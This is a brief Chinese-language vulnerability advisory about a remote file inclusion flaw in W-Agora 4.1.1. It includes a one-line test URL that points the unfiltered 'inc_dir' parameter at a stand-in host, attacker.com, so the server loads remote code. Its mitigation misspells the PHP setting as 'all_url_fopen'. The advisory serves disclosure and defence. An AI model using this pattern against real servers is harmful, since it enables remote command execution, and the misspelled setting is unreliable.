W-Agora存在远程文件包含漏洞发布时间:2002-06-13 更新时间:2002-06-13 严重程度:中 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:4977 受影响系统 Marc Druilhe W-Agora 4.1.1详细描述 W-Agora存在漏洞允许攻击者包含远程服务器上的任意文件,'inc_dir'变量包含在W-Agora的多个脚本中用来定义配置文件的路径,由于对路径缺少过滤,这样就可以导致攻击者把包含的文件指向远程服务器上的文件,如果文件中包含恶意命令就可以导致命令在W-Agora系统上执行。 测试代码 http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt 解决方案 配置PHP中设置'all_url_fopen'为'off'。 相关信息 "Frog Man" <leseulfrog@hotmail.com>. 参考:http://online.securityfocus.com/archive/1/276032 相关主页:http://www.w-agora.net/en/index.php |
